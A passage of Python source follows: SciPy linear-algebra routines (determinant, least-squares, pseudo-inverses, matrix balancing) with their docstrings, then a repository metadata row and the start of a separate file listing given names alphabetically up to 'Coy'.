>>> from scipy import linalg
>>> a = np.array([[1,2,3], [4,5,6], [7,8,9]])
>>> linalg.det(a)
0.0
>>> a = np.array([[0,2,3], [4,5,6], [7,8,9]])
>>> linalg.det(a)
3.0
"""
a1 = _asarray_validated(a, check_finite=check_finite)
if len(a1.shape) != 2 or a1.shape[0] != a1.shape[1]:
raise ValueError('expected square matrix')
overwrite_a = overwrite_a or _datacopied(a1, a)
fdet, = get_flinalg_funcs(('det',), (a1,))
a_det, info = fdet(a1, overwrite_a=overwrite_a)
if info < 0:
raise ValueError('illegal value in %d-th argument of internal '
'det.getrf' % -info)
return a_det
# Linear Least Squares
def lstsq(a, b, cond=None, overwrite_a=False, overwrite_b=False,
check_finite=True, lapack_driver=None):
"""
Compute least-squares solution to equation Ax = b.
Compute a vector x such that the 2-norm ``|b - A x|`` is minimized.
Parameters
----------
a : (M, N) array_like
Left hand side array
b : (M,) or (M, K) array_like
Right hand side array
cond : float, optional
Cutoff for 'small' singular values; used to determine effective
rank of a. Singular values smaller than
``rcond * largest_singular_value`` are considered zero.
overwrite_a : bool, optional
Discard data in `a` (may enhance performance). Default is False.
overwrite_b : bool, optional
Discard data in `b` (may enhance performance). Default is False.
check_finite : bool, optional
Whether to check that the input matrices contain only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
lapack_driver : str, optional
Which LAPACK driver is used to solve the least-squares problem.
Options are ``'gelsd'``, ``'gelsy'``, ``'gelss'``. Default
(``'gelsd'``) is a good choice. However, ``'gelsy'`` can be slightly
faster on many problems. ``'gelss'`` was used historically. It is
generally slow but uses less memory.
.. versionadded:: 0.17.0
Returns
-------
x : (N,) or (N, K) ndarray
Least-squares solution. Return shape matches shape of `b`.
residues : (K,) ndarray or float
Square of the 2-norm for each column in ``b - a x``, if ``M > N`` and
``rank(A) == n`` (returns a scalar if b is 1-D). Otherwise a
(0,)-shaped array is returned.
rank : int
Effective rank of `a`.
s : (min(M, N),) ndarray or None
Singular values of `a`. The condition number of a is
``abs(s[0] / s[-1])``.
Raises
------
LinAlgError
If computation does not converge.
ValueError
When parameters are not compatible.
See Also
--------
scipy.optimize.nnls : linear least squares with non-negativity constraint
Notes
-----
When ``'gelsy'`` is used as a driver, `residues` is set to a (0,)-shaped
array and `s` is always ``None``.
Examples
--------
>>> from scipy.linalg import lstsq
>>> import matplotlib.pyplot as plt
Suppose we have the following data:
>>> x = np.array([1, 2.5, 3.5, 4, 5, 7, 8.5])
>>> y = np.array([0.3, 1.1, 1.5, 2.0, 3.2, 6.6, 8.6])
We want to fit a quadratic polynomial of the form ``y = a + b*x**2``
to this data. We first form the "design matrix" M, with a constant
column of 1s and a column containing ``x**2``:
>>> M = x[:, np.newaxis]**[0, 2]
>>> M
array([[ 1. , 1. ],
[ 1. , 6.25],
[ 1. , 12.25],
[ 1. , 16. ],
[ 1. , 25. ],
[ 1. , 49. ],
[ 1. , 72.25]])
We want to find the least-squares solution to ``M.dot(p) = y``,
where ``p`` is a vector with length 2 that holds the parameters
``a`` and ``b``.
>>> p, res, rnk, s = lstsq(M, y)
>>> p
array([ 0.20925829, 0.12013861])
Plot the data and the fitted curve.
>>> plt.plot(x, y, 'o', label='data')
>>> xx = np.linspace(0, 9, 101)
>>> yy = p[0] + p[1]*xx**2
>>> plt.plot(xx, yy, label='least squares fit, $y = a + bx^2$')
>>> plt.xlabel('x')
>>> plt.ylabel('y')
>>> plt.legend(framealpha=1, shadow=True)
>>> plt.grid(alpha=0.25)
>>> plt.show()
"""
a1 = _asarray_validated(a, check_finite=check_finite)
b1 = _asarray_validated(b, check_finite=check_finite)
if len(a1.shape) != 2:
raise ValueError('Input array a should be 2-D')
m, n = a1.shape
if len(b1.shape) == 2:
nrhs = b1.shape[1]
else:
nrhs = 1
if m != b1.shape[0]:
raise ValueError('Shape mismatch: a and b should have the same number'
' of rows ({} != {}).'.format(m, b1.shape[0]))
if m == 0 or n == 0: # Zero-sized problem, confuses LAPACK
x = np.zeros((n,) + b1.shape[1:], dtype=np.common_type(a1, b1))
if n == 0:
residues = np.linalg.norm(b1, axis=0)**2
else:
residues = np.empty((0,))
return x, residues, 0, np.empty((0,))
driver = lapack_driver
if driver is None:
driver = lstsq.default_lapack_driver
if driver not in ('gelsd', 'gelsy', 'gelss'):
raise ValueError('LAPACK driver "%s" is not found' % driver)
lapack_func, lapack_lwork = get_lapack_funcs((driver,
'%s_lwork' % driver),
(a1, b1))
real_data = True if (lapack_func.dtype.kind == 'f') else False
if m < n:
# need to extend b matrix as it will be filled with
# a larger solution matrix
if len(b1.shape) == 2:
b2 = np.zeros((n, nrhs), dtype=lapack_func.dtype)
b2[:m, :] = b1
else:
b2 = np.zeros(n, dtype=lapack_func.dtype)
b2[:m] = b1
b1 = b2
overwrite_a = overwrite_a or _datacopied(a1, a)
overwrite_b = overwrite_b or _datacopied(b1, b)
if cond is None:
cond = np.finfo(lapack_func.dtype).eps
if driver in ('gelss', 'gelsd'):
if driver == 'gelss':
lwork = _compute_lwork(lapack_lwork, m, n, nrhs, cond)
v, x, s, rank, work, info = lapack_func(a1, b1, cond, lwork,
overwrite_a=overwrite_a,
overwrite_b=overwrite_b)
elif driver == 'gelsd':
if real_data:
lwork, iwork = _compute_lwork(lapack_lwork, m, n, nrhs, cond)
x, s, rank, info = lapack_func(a1, b1, lwork,
iwork, cond, False, False)
else: # complex data
lwork, rwork, iwork = _compute_lwork(lapack_lwork, m, n,
nrhs, cond)
x, s, rank, info = lapack_func(a1, b1, lwork, rwork, iwork,
cond, False, False)
if info > 0:
raise LinAlgError("SVD did not converge in Linear Least Squares")
if info < 0:
raise ValueError('illegal value in %d-th argument of internal %s'
% (-info, lapack_driver))
resids = np.asarray([], dtype=x.dtype)
if m > n:
x1 = x[:n]
if rank == n:
resids = np.sum(np.abs(x[n:])**2, axis=0)
x = x1
return x, resids, rank, s
elif driver == 'gelsy':
lwork = _compute_lwork(lapack_lwork, m, n, nrhs, cond)
jptv = np.zeros((a1.shape[1], 1), dtype=np.int32)
v, x, j, rank, info = lapack_func(a1, b1, jptv, cond,
lwork, False, False)
if info < 0:
raise ValueError("illegal value in %d-th argument of internal "
"gelsy" % -info)
if m > n:
x1 = x[:n]
x = x1
return x, np.array([], x.dtype), rank, None
lstsq.default_lapack_driver = 'gelsd'
def pinv(a, cond=None, rcond=None, return_rank=False, check_finite=True):
"""
Compute the (Moore-Penrose) pseudo-inverse of a matrix.
Calculate a generalized inverse of a matrix using a least-squares
solver.
Parameters
----------
a : (M, N) array_like
Matrix to be pseudo-inverted.
cond, rcond : float, optional
Cutoff for 'small' singular values in the least-squares solver.
Singular values smaller than ``rcond * largest_singular_value``
are considered zero.
return_rank : bool, optional
if True, return the effective rank of the matrix
check_finite : bool, optional
Whether to check that the input matrix contains only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
B : (N, M) ndarray
The pseudo-inverse of matrix `a`.
rank : int
The effective rank of the matrix. Returned if return_rank == True
Raises
------
LinAlgError
If computation does not converge.
Examples
--------
>>> from scipy import linalg
>>> a = np.random.randn(9, 6)
>>> B = linalg.pinv(a)
>>> np.allclose(a, np.dot(a, np.dot(B, a)))
True
>>> np.allclose(B, np.dot(B, np.dot(a, B)))
True
"""
a = _asarray_validated(a, check_finite=check_finite)
b = np.identity(a.shape[0], dtype=a.dtype)
if rcond is not None:
cond = rcond
x, resids, rank, s = lstsq(a, b, cond=cond, check_finite=False)
if return_rank:
return x, rank
else:
return x
def pinv2(a, cond=None, rcond=None, return_rank=False, check_finite=True):
"""
Compute the (Moore-Penrose) pseudo-inverse of a matrix.
Calculate a generalized inverse of a matrix using its
singular-value decomposition and including all 'large' singular
values.
Parameters
----------
a : (M, N) array_like
Matrix to be pseudo-inverted.
cond, rcond : float or None
Cutoff for 'small' singular values.
Singular values smaller than ``rcond*largest_singular_value``
are considered zero.
If None or -1, suitable machine precision is used.
return_rank : bool, optional
if True, return the effective rank of the matrix
check_finite : bool, optional
Whether to check that the input matrix contains only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
B : (N, M) ndarray
The pseudo-inverse of matrix `a`.
rank : int
The effective rank of the matrix. Returned if return_rank == True
Raises
------
LinAlgError
If SVD computation does not converge.
Examples
--------
>>> from scipy import linalg
>>> a = np.random.randn(9, 6)
>>> B = linalg.pinv2(a)
>>> np.allclose(a, np.dot(a, np.dot(B, a)))
True
>>> np.allclose(B, np.dot(B, np.dot(a, B)))
True
"""
a = _asarray_validated(a, check_finite=check_finite)
u, s, vh = decomp_svd.svd(a, full_matrices=False, check_finite=False)
if rcond is not None:
cond = rcond
if cond in [None, -1]:
t = u.dtype.char.lower()
factor = {'f': 1E3, 'd': 1E6}
cond = factor[t] * np.finfo(t).eps
rank = np.sum(s > cond * np.max(s))
u = u[:, :rank]
u /= s[:rank]
B = np.transpose(np.conjugate(np.dot(u, vh[:rank])))
if return_rank:
return B, rank
else:
return B
def pinvh(a, cond=None, rcond=None, lower=True, return_rank=False,
check_finite=True):
"""
Compute the (Moore-Penrose) pseudo-inverse of a Hermitian matrix.
Calculate a generalized inverse of a Hermitian or real symmetric matrix
using its eigenvalue decomposition and including all eigenvalues with
'large' absolute value.
Parameters
----------
a : (N, N) array_like
Real symmetric or complex hermetian matrix to be pseudo-inverted
cond, rcond : float or None
Cutoff for 'small' eigenvalues.
Singular values smaller than rcond * largest_eigenvalue are considered
zero.
If None or -1, suitable machine precision is used.
lower : bool, optional
Whether the pertinent array data is taken from the lower or upper
triangle of a. (Default: lower)
return_rank : bool, optional
if True, return the effective rank of the matrix
check_finite : bool, optional
Whether to check that the input matrix contains only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
B : (N, N) ndarray
The pseudo-inverse of matrix `a`.
rank : int
The effective rank of the matrix. Returned if return_rank == True
Raises
------
LinAlgError
If eigenvalue does not converge
Examples
--------
>>> from scipy.linalg import pinvh
>>> a = np.random.randn(9, 6)
>>> a = np.dot(a, a.T)
>>> B = pinvh(a)
>>> np.allclose(a, np.dot(a, np.dot(B, a)))
True
>>> np.allclose(B, np.dot(B, np.dot(a, B)))
True
"""
a = _asarray_validated(a, check_finite=check_finite)
s, u = decomp.eigh(a, lower=lower, check_finite=False)
if rcond is not None:
cond = rcond
if cond in [None, -1]:
t = u.dtype.char.lower()
factor = {'f': 1E3, 'd': 1E6}
cond = factor[t] * np.finfo(t).eps
# For Hermitian matrices, singular values equal abs(eigenvalues)
above_cutoff = (abs(s) > cond * np.max(abs(s)))
psigma_diag = 1.0 / s[above_cutoff]
u = u[:, above_cutoff]
B = np.dot(u * psigma_diag, np.conjugate(u).T)
if return_rank:
return B, len(psigma_diag)
else:
return B
def matrix_balance(A, permute=True, scale=True, separate=False,
overwrite_a=False):
"""
Compute a diagonal similarity transformation for row/column balancing.
The balancing tries to equalize the row and column 1-norms by applying
a similarity transformation such that the magnitude variation of the
matrix entries is reflected to the scaling matrices.
Moreover, if enabled, the matrix is first permuted to isolate the upper
triangular parts of the matrix and, again if scaling is also enabled,
only the remaining subblocks are subjected to scaling.
The balanced matrix satisfies the following equality
.. math::
B = T^{-1} A T
The scaling coefficients are approximated to the nearest power of 2
to avoid round-off errors.
Parameters
----------
A : (n, n) array_like
Square data matrix for the balancing.
permute : bool, optional
The selector to define whether permutation of A is also performed
prior to scaling.
scale : bool, optional
The selector to turn on and off the scaling. If False, the matrix
will not be scaled.
separate : bool, optional
This switches from returning a full matrix of the transformation
to a tuple of two separate 1D permutation and scaling arrays.
overwrite_a : bool, optional
This is passed to xGEBAL directly. Essentially, overwrites the result
to the data. It might increase the space efficiency. See LAPACK manual
for details. This is False by default.
Returns
-------
B : (n, n) ndarray
Balanced matrix
T : (n, n) ndarray
A possibly permuted diagonal matrix whose nonzero entries are
integer powers of 2 to avoid numerical truncation errors.
scale, perm : (n,) ndarray
If ``separate`` keyword is set to True then instead of the array
``T`` above, the scaling and the permutation vectors are given
separately as a tuple without allocating the full array ``T``.
Notes
-----
This algorithm is particularly useful for eigenvalue and matrix
decompositions and in many cases it is already called by various
LAPACK routines.
The algorithm is based on the well-known technique of [1]_ and has
been modified to account for special cases. See [2]_ for details
which have been implemented since LAPACK v3.5.0. Before this version
there are corner cases where balancing can actually worsen the
conditioning. See [3]_ for such examples.
The code is a wrapper around LAPACK's xGEBAL routine family for matrix
balancing.
.. versionadded:: 0.19.0
Examples
--------
>>> from scipy import linalg
>>> x = np.array([[1,2,0], [9,1,0.01], [1,2,10*np.pi]])
>>> y, permscale = linalg.matrix_balance(x)
>>> np.abs(x).sum(axis=0) / np.abs(x).sum(axis=1)
array([ 3.66666667, 0.4995005 , 0.91312162])
>>> np.abs(y).sum(axis=0) / np.abs(y).sum(axis=1)
array([ 1.2 , 1.27041742, 0.92658316]) # may vary
>>> permscale # only powers of 2 (0.5 == 2^(-1))
array([[ 0.5, 0. , 0. ], # may vary
[ 0. , 1. , 0. ],
[ 0. , 0. , 1. ]])
References
----------
.. [1] : B.N. Parlett and C. Reinsch, "Balancing a Matrix for
Calculation of Eigenvalues and Eigenvectors", Numerische Mathematik,
Vol.13(4), 1969, DOI:10.1007/BF02165404
.. [2] : R. James, J. Langou, B.R. Lowery, "On matrix balancing and
eigenvector computation", 2014, Available online:
https://arxiv.org/abs/1401.5766
.. [3] : D.S. Watkins. A case where balancing is harmful.
Electron. Trans. Numer. Anal, Vol.23, 2006.
"""
A = np.atleast_2d(_asarray_validated(A, check_finite=True))
if not np.equal(*A.shape):
raise ValueError('The data matrix for balancing should be square.')
gebal = get_lapack_funcs(('gebal'), (A,))
B, lo, hi, ps, info = gebal(A, scale=scale, permute=permute,
overwrite_a=overwrite_a)
if info < 0:
raise ValueError('xGEBAL exited with the internal error '
'"illegal value in argument number {}.". See '
'LAPACK documentation for the xGEBAL error codes.'
''.format(-info))
# Separate the permutations from the scalings and then convert to int
scaling = np.ones_like(ps, dtype=float)
scaling[lo:hi+1] = ps[lo:hi+1]
# gebal uses 1-indexing
ps = ps.astype(int, copy=False) - 1
n = A.shape[0]
perm = np.arange(n)
# LAPACK permutes with the ordering n --> hi, then 0--> lo
if hi < n:
for ind, x in enumerate(ps[hi+1:][::-1], 1):
if n-ind == x:
continue
perm[[x, n-ind]] = perm[[n-ind, x]]
if lo > 0:
for ind, x in enumerate(ps[:lo]):
if ind == x:
continue
perm[[x, ind]] = perm[[ind, x]]
if separate:
return B, (scaling, perm)
# get the inverse permutation
iperm = np.empty_like(perm)
iperm[perm] = np.arange(n)
return B, np.diag(scaling)[iperm, :]
| Eric89GXL/scipy | scipy/linalg/basic.py | Python | bsd-3-clause | 55,293 |
names = [ # NOQA
'Aan',
'Aalia',
'Aaliah',
'Aaliyah',
'Aaron',
'Aaryanna',
'Aavree',
'Abbie',
'Abbott',
'Abbra',
'Abby',
'Abe',
'Abel',
'Abelardo',
'Abeni',
'Abia',
'Abiba',
'Abie',
'Abigail',
'Abner',
'Abraham',
'Abram',
'Abrial',
'Abrianna',
'Abrienda',
'Abril',
'Abryl',
'Absolom',
'Abu',
'Acacia',
'Acadia',
'Ace',
'Achika',
'Acsah; achsah',
'Ada',
'Adabeel',
'Adah',
'Adair',
'Adalia',
'Adam',
'Adamina',
'Adamma',
'Adara',
'Addison',
'Ade',
'Adela',
'Adelaide',
'Adele',
'Adeline',
'Adelio',
'Adelle',
'Adem',
'Aden',
'Aderes',
'Adian',
'Adie',
'Adiel',
'Adil',
'Adila',
'Adina',
'Adir',
'Adita',
'Adkins',
'Adlai',
'Adler',
'Adli',
'Adolfo',
'Adolph',
'Adonai',
'Adonia',
'Adonijah',
'Adora',
'Adra',
'Adrian',
'Adriana',
'Adriano',
'Adriel',
'Adrienne',
'Adrina',
'Ady',
'Aelan',
'Aeyesha',
'Affrica',
'Afra',
'Afric',
'Africa',
'Afton',
'Agamemnon',
'Agatha',
'Aggie',
'Agnes',
'Ah cy',
'Ahava',
'Ai',
'Aida',
'Aidan',
'Aiko',
'Aileen',
'Ailis',
'Ailish',
'Ailo',
'Aimee',
'Aine',
'Ainsley',
'Aisha',
'Aisleigh',
'Aisling',
'Aislinn',
'Aiyan',
'Aizza',
'Aja',
'Ajani',
'Ajay',
'Ajel',
'Akeel',
'Akeem',
'Akili',
'Akira',
'Akoya',
'Akuji',
'Al',
'Alaina',
'Alair',
'Alake',
'Alan',
'Alana',
'Alanna',
'Alara',
'Alastair',
'Alaura',
'Alazne',
'Alban',
'Albany',
'Albert',
'Alberta',
'Alberto',
'Albin',
'Albina',
'Alda',
'Aldan',
'Alden',
'Alder',
'Aldina',
'Aldo',
'Aldon',
'Aldona',
'Alec',
'Aleda',
'Alejandra',
'Alejandro',
'Alem',
'Alena',
'Alesia',
'Alessa',
'Aleta',
'Aletha',
'Alethea',
'Aletta',
'Alex',
'Alexa',
'Alexander',
'Alexandra',
'Alexandria',
'Alexei',
'Alexia',
'Alexis',
'Alexsandra',
'Alfonso',
'Alfred',
'Algeron',
'Ali',
'Alia',
'Alice',
'Alicia',
'Alida',
'Alijah',
'Alika',
'Alima',
'Alina',
'Alisa',
'Alisha',
'Alison',
'Alissa',
'Alitza',
'Alivia',
'Aliya',
'Aliyah',
'Aliza',
'Alize',
'Alka',
'Allegra',
'Allen',
'Allene',
'Allie',
'Allison',
'Allyson',
'Alma',
'Almeda',
'Alohilani',
'Alonzo',
'Aloysius',
'Alphonse',
'Alsatia',
'Alta',
'Altagrace',
'Althea',
'Alva',
'Alvin',
'Alyanah',
'Alyn',
'Alyse & alysse',
'Alyson',
'Alyssa',
'Amadeus',
'Amador',
'Amalia',
'Amalie',
'Aman',
'Amana',
'Amanda',
'Amandla',
'Amara',
'Amaranta',
'Amarante',
'Amaranth',
'Amaris',
'Amaryllis',
'Amaya',
'Amber',
'Ambrose',
'Ambrosia',
'Ame',
'Amelia',
'Amena',
'America',
'Amerigo',
'Ami',
'Amia',
'Amie',
'Amiel',
'Amilynne',
'Amina',
'Amir',
'Amiri',
'Amity',
'Amma',
'Amorina',
'Amos',
'Amy',
'An',
'Ana',
'Anabelle',
'Anahi',
'Anais',
'Anaiya',
'Analiese',
'Analise',
'Anana',
'Anando',
'Anastasia',
'Anatola',
'Anatole',
'Ande',
'Andra',
'Andralyn',
'Andre',
'Andrea',
'Andreas',
'Andres',
'Andrew',
'Andy',
'Anecia',
'Aneesa',
'Anel',
'Anemone',
'Anevay',
'Angel',
'Angela',
'Angelica',
'Angelina',
'Angelo',
'Angie',
'Angus',
'Anh',
'Ani',
'Ania',
'Anibal',
'Anika',
'Anila',
'Anisa',
'Anita',
'Anitra',
'Anja',
'Anlon',
'Ann',
'Anna',
'Annakin',
'Annalise',
'Annamae',
'Annamika',
'Anne',
'Anneke',
'Annette',
'Annice',
'Annick',
'Annika (anika, aneka)',
'Annis',
'Annissa',
'Anniyyah',
'Annora',
'Annot',
'Ansley',
'Anthea',
'Anthony',
'Anthy',
'Antigone',
'Antionette',
'Antipholus',
'Antoine',
'Antoinette',
'Antonia',
'Antonie',
'Antonio',
'Antony',
'Anu',
'Anwar',
'Anya',
'Aoko',
'Aolani',
'Aowyn',
'Aphrodite',
'Apollo',
'Appollo',
'Apria',
'April',
'Aquila',
'Arabela',
'Arabella',
'Araceli',
'Aram',
'Aran',
'Aravis',
'Arch',
'Archibald',
'Archie',
'Ardith',
'Aren',
'Aretha',
'Argus',
'Ari',
'Aria',
'Ariana',
'Ariel',
'Ariella',
'Arielle',
'Arien',
'Aries',
'Arissa',
'Arista',
'Ariza',
'Arkadiy',
'Arland',
'Arlen',
'Arlene',
'Arlo',
'Arlynda',
'Armand',
'Armande',
'Armando',
'Armelle',
'Armetha',
'Armina',
'Armon',
'Arnaud',
'Arne',
'Arnie',
'Arnold',
'Aron',
'Aroq',
'Arpan',
'Art',
'Artemis',
'Arthur',
'Artie',
'Arty',
'Arvid',
'Arvin',
'Aryiah',
'Aryka',
'Asa',
'Asabi',
'Asalie',
'Asasia',
'Ash',
'Asha',
'Ashai',
'Ashby',
'Asher',
'Ashlea',
'Ashlee',
'Ashleigh',
'Ashley',
'Ashlie',
'Ashling',
'Ashlyn',
'Ashtin',
'Ashton',
'Ashtyn',
'Asia',
'Asis',
'Asli',
'Asnee',
'Aspen',
'Asta',
'Asthore',
'Astin',
'Astra',
'Astrid',
'Atalo',
'Athalia',
'Athena',
'Atira',
'Atlas',
'Atreyu',
'Atticus',
'Attylaka',
'Auberta',
'Aubrey',
'Aubrianna',
'Audi',
'Audra',
'Audrey',
'August',
'Augustin',
'Augustus',
'Auhna',
'Aulii',
'Aure',
'Aurelia',
'Aurora',
'Aurorette',
'Austin',
'Autumn',
'Ava',
'Avalie',
'Avalon',
'Avel',
'Aveline',
'Avery',
'Avi',
'Avianna',
'Avis',
'Avital',
'Aviv',
'Aviva',
'Avongara',
'Axel',
'Axelle',
'Aya',
'Ayame',
'Ayanna',
'Ayeka',
'Ayla',
'Aylieah',
'Aylira',
'Ayoka',
'Aysha',
'Azana',
'Aziza',
'Azize',
'Azra',
'Azriel',
'Azuka',
'Azura',
'Azza',
'Baba',
'Babette',
'Bagley',
'Bahari',
'Bailey',
'Baird',
'Bairn',
'Bakula',
'Ballard',
'Balthasar',
'Balu',
'Bambi',
'Banji',
'Barake',
'Barb',
'Barbara',
'Barbie',
'Barclay',
'Bari',
'Barke',
'Barnabas',
'Barnard',
'Barney',
'Barny',
'Barr',
'Barran',
'Barrett',
'Barretta',
'Barry',
'Bart',
'Barth',
'Bartholemew',
'Barto',
'Barton',
'Baruch',
'Bary',
'Bash',
'Basil',
'Basiliso',
'Bast',
'Bastien',
'Baxter',
'Bayard',
'Bayen',
'Baylee',
'Bayo',
'Bea',
'Beata',
'Beate',
'Beatrice',
'Beatriz',
'Beau',
'Beauregard',
'Bebe',
'Bebhin',
'Becca',
'Beck',
'Becka',
'Becky',
'Bel',
'Bela',
'Belay',
'Belden',
'Belen',
'Belinda',
'Belita',
'Bell',
'Bella',
'Belle',
'Bellini',
'Ben',
'Bena',
'Benard',
'Benedict & benedicta',
'Benen',
'Benita',
'Benjamin',
'Benjy',
'Bennett',
'Benny',
'Benson',
'Berdine',
'Berg',
'Berke',
'Bern',
'Bernadette',
'Bernadine',
'Bernard',
'Berne',
'Bernice',
'Bernie',
'Berny',
'Bert',
'Bertha',
'Bertille',
'Beryl',
'Bess',
'Bessie',
'Beth',
'Bethan',
'Bethany',
'Betsy',
'Bette',
'Bettina',
'Betty',
'Beulah',
'Bevan',
'Beverly',
'Bevis',
'Beyla',
'Biana',
'Bianca',
'Bibiane',
'Bidelia',
'Bikita',
'Bilen',
'Bill',
'Billy',
'Bin',
'Bina',
'Bing',
'Bingham',
'Birch',
'Bisbee',
'Bishop',
'Biton',
'Bjorn',
'Blade',
'Blaine',
'Blair',
'Blaise',
'Blake',
'Blanche',
'Blaze',
'Blenda',
'Blinda',
'Bliss',
'Blithe',
'Blodwyn',
'Blossom',
'Blum',
'Bluma',
'Bly',
'Blythe',
'Bo',
'Boaz',
'Bob',
'Bodee',
'Bona',
'Bonaventure',
'Bond',
'Bonita',
'Bonna',
'Bonnie',
'Bono',
'Boone',
'Boris',
'Botarea',
'Bowen',
'Bowie',
'Boyd',
'Bracha',
'Brad',
'Bradden',
'Braden',
'Bradford',
'Bradley',
'Brady',
'Braeden',
'Braima',
'Bran',
'Brand',
'Brandee',
'Branden',
'Brandi',
'Brandie',
'Brandon',
'Brandy',
'Branellan',
'Brant',
'Braxton',
'Brayden',
'Brazil',
'Breanna',
'Breckin',
'Brede',
'Bree',
'Brein',
'Brend',
'Brenda',
'Brendan',
'Brenden',
'Brendon',
'Brenna',
'Brennan',
'Brennon',
'Brent',
'Brett',
'Brewster',
'Brian',
'Briana',
'Brianna',
'Brianne',
'Briar',
'Brice',
'Brick',
'Bridget',
'Bridgit',
'Brie',
'Brielle',
'Brier',
'Brigham',
'Brighton',
'Brigit',
'Brigitte',
'Brilane',
'Brilliant',
'Brin',
'Brina',
'Brinkley',
'Brinly',
'Brit',
'Brita',
'Britain',
'Britannia',
'Britany',
'Britt',
'Britt-marie',
'Brittani',
'Britannia',
'Brittany',
'Brittnee & brittney',
'Brock',
'Brody',
'Bron',
'Brondyn',
'Brone',
'Bronson',
'Bronwen',
'Brooke',
'Brooklyn',
'Brooks',
'Bruce',
'Bruno',
'Bryan',
'Bryanne',
'Bryant',
'Bryce',
'Brygid',
'Brynn',
'Bryony',
'Bryton',
'Buck',
'Bud',
'Buddy',
'Buffi',
'Buffy',
'Buford',
'Bunny',
'Burdette',
'Burke',
'Burlak',
'Burt',
'Burton',
'Butterfly',
'Buzz',
'Byrd',
'Byron',
'Cade',
'Cadee',
'Caden',
'Cadence',
'Cady',
'Cael',
'Caelan',
'Caeley',
'Caesar',
'Cai',
'Cailean',
'Caimile',
'Cain',
'Caine',
'Caique',
'Cairbre',
'Cairo',
'Cais',
'Caitlin',
'Caitlyn',
'Cal',
'Cala',
'Calais',
'Calandra',
'Calantha',
'Calder',
'Cale',
'Caleah',
'Caleb',
'Caley',
'Calhoun',
'Calix',
'Calixte',
'Calla',
'Callia',
'Calliope',
'Callista',
'Callum',
'Calvin',
'Calvine',
'Calypso',
'Cam',
'Cambria',
'Camden',
'Camdyn',
'Cameron',
'Camilla',
'Camille',
'Camilo',
'Camlin',
'Cana',
'Canaan',
'Candace',
'Candice',
'Candida',
'Candide',
'Candie',
'Candy',
'Cannon',
'Capri',
'Caprice',
'Caquise',
'Cara',
'Caralee',
'Caresse',
'Carey',
'Carha',
'Cari',
'Carina',
'Carissa',
'Carl',
'Carla',
'Carleton',
'Carley',
'Carlie',
'Carlisle',
'Carlos',
'Carlota',
'Carlotta',
'Carlton',
'Carly',
'Carmel',
'Carmela',
'Carmelita',
'Carmen',
'Carmine',
'Carol',
'Carolena',
'Carolina',
'Caroline',
'Carolyn',
'Caron',
'Carra',
'Carr',
'Carrick',
'Carrie',
'Carrieann',
'Carson',
'Carsyn',
'Carter',
'Carver',
'Cary',
'Casandra',
'Casey',
'Cashlin',
'Casimir',
'Casondra',
'Caspar',
'Casper',
'Cassandra',
'Cassee',
'Cassia',
'Cassidy',
'Cassie',
'Cassius',
'Castel',
'Catalin',
'Catherine',
'Cathy',
'Catrin',
'Caven',
'Cayla',
'Ceana',
'Cearo',
'Cece',
'Cecil',
'Cecile',
'Cecilia',
'Cecily',
'Cedric',
'Celeste',
'Celestyn',
'Celia',
'Celina',
'Celine',
'Cera',
'Cerise',
'Cesar',
'Ceylan',
'Chad',
'Chaela',
'Chaeli',
'Chailyn',
'Chaim',
'Chakotay',
'Chalina',
'Chalsie',
'Chana',
'Chance',
'Chancellor',
'Chandler',
'Chandra',
'Chanel',
'Chanell',
'Chanelle',
'Chaney',
'Channing',
'Channon',
'Chantal',
'Chantel',
'Chaplin',
'Chardonnay',
'Charis',
'Charisse',
'Charity',
'Charla',
'Charlee',
'Charleigh',
'Charlene',
'Charles',
'Charlet',
'Charlin',
'Charlot',
'Charlotte',
'Charmaine',
'Charo',
'Chars',
'Charu',
'Chas',
'Chase',
'Chastity',
'Chauncey',
'Chava',
'Chavi',
'Chay',
'Chaya',
'Chaylse',
'Chayza',
'Cheche',
'Chelsa',
'Chelsea',
'Chelsey',
'Chelsi',
'Chelsia',
'Chen',
'Cheney',
'Chenoa',
'Cher',
'Cheri',
'Cherie',
'Cherish',
'Cherlin',
'Cherry',
'Cheryl',
'Chesna',
'Chester',
'Cheston',
'Chet',
'Cheyenne',
'Cheyne',
'Chezarina',
'Chhaya',
'Chia',
'Chick',
'Chico',
'Chika',
'Chill',
'Chilton',
'Chimelu',
'Chimon',
'China',
'Chip',
'Chipo',
'Chirag',
'Chloe',
'Chloris',
'Chris',
'Chrissy',
'Christa',
'Christena',
'Christian',
'Christiana',
'Christie',
'Christina',
'Christine',
'Christopher',
'Christy',
'Chuck',
'Chumani',
'Chun',
'Chyna',
'Chynna',
'Cian',
'Cianna',
'Ciara',
'Cicely',
'Cicero',
'Cicily',
'Cid',
'Ciel',
'Cindy',
'Cira',
'Cirila',
'Ciro',
'Cirocco',
'Cissy',
'Citlalli',
'Claire',
'Clancy',
'Clara',
'Claral',
'Clare',
'Clarence',
'Clarissa',
'Clark',
'Clarke',
'Claude',
'Claudia',
'Claudine',
'Clay',
'Clayland',
'Clayton',
'Clea',
'Cleantha',
'Cleatus',
'Cleavant',
'Cleave',
'Cleavon',
'Clem',
'Clemens',
'Clement',
'Clementine',
'Cleo',
'Cleta',
'Cleveland',
'Cliff',
'Clifford',
'Clifton',
'Clint',
'Clinton',
'Clio',
'Clitus',
'Clive',
'Clodagh',
'Clodia',
'Cloris',
'Clove',
'Clover',
'Coby',
'Cocheta',
'Cody',
'Colby',
'Cole',
'Colebrook',
'Colette',
'Coligny',
'Colin',
'Colista',
'Colleen',
'Collice',
'Collin',
'Colm',
'Colman',
'Colton',
'Columbia',
'Comfort',
'Conan',
'Conlan',
'Conley',
'Conner',
'Connie',
'Connley',
'Connor',
'Conor',
'Conrad',
'Constance',
'Constantine',
'Consuela',
'Consuelo',
'Contavious',
'Content',
'Contessa',
'Conway',
'Conyers',
'Cooper',
'Cora',
'Coral',
'Coralia',
'Coralie',
'Corban',
'Corbin',
'Corby',
'Cordelia',
'Corentine',
'Corey',
'Corin',
'Corina',
'Corine',
'Corinna',
'Corinne',
'Corky',
'Corliss',
'Corlista',
'Cornelia',
'Cornelius',
'Cornell',
'Corretta',
'Corrine',
'Cort',
'Cory',
'Cosette',
'Cosima',
'Cosmo',
'Coty',
'Courtney',
'Coy',
